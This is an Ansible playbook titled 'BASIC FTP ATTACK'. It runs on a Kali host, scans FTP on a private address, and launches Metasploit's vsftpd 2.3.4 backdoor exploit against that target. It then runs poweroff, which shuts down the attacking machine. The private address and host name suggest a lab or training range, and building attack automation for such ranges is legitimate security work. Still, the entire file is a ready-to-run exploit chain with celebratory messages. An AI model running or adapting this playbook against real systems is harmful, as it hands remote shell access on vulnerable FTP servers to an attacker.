---
- name: BASIC FTP ATTACK
  hosts: thx_kali
  become: yes
  gather_facts: no

  tasks:
    - name: CHECKING SERVICE STATUS
      shell: nmap -sV -p21 -sC -A 10.10.200.2
      register: result1
      ignore_errors: yes

    - name: Process CHECKING SERVICE STATUS
      block:
        - name: SUCCESS 1
          debug:
            msg: "ITS OPEN LETS GO MAN: {{ result1.stdout if result1.stdout is defined else 'No stdout available' }}"
      rescue:
        - name: HALT CHECKING SERVICE STATUS
          debug:
            msg: "OKAY !! NO WAY: {{ result1.stderr if result1.stderr is defined else 'No stderr available' }}"
        - name: STOPPED
          fail:
            msg: "Stopping playbook due to command 1 failure."

    - name: RUN EXPLOIT
      shell: msfconsole -q -x 'use exploit/unix/ftp/vsftpd_234_backdoor; set RHOST 10.10.200.2; exploit; exit'
      register: result6
      ignore_errors: yes

    - name: Process RUN EXPLOIT
      block:
        - name: SUCCESS 6
          debug:
            msg: "SHOOTS FIRED LETS GO MAN: {{ result6.stdout if result6.stdout is defined else 'No stdout available' }}"
      rescue:
        - name: HALT RUN EXPLOIT
          debug:
            msg: "OKAY !! NO WAY: {{ result6.stderr if result6.stderr is defined else 'No stderr available' }}"

    - name: SHUTDOWN SYSTEM
      shell: poweroff
      register: result7
      ignore_errors: yes

    - name: Process SHUTDOWN SYSTEM
      block:
        - name: SUCCESS 7
          debug:
            msg: "SYSTEM SHUTDOWN: {{ result7.stdout if result7.stdout is defined else 'No stdout available' }}"
      rescue:
        - name: HALT SHUTDOWN SYSTEM
          debug:
            msg: "OKAY !! NO WAY: {{ result7.stderr if result7.stderr is defined else 'No stderr available' }}"
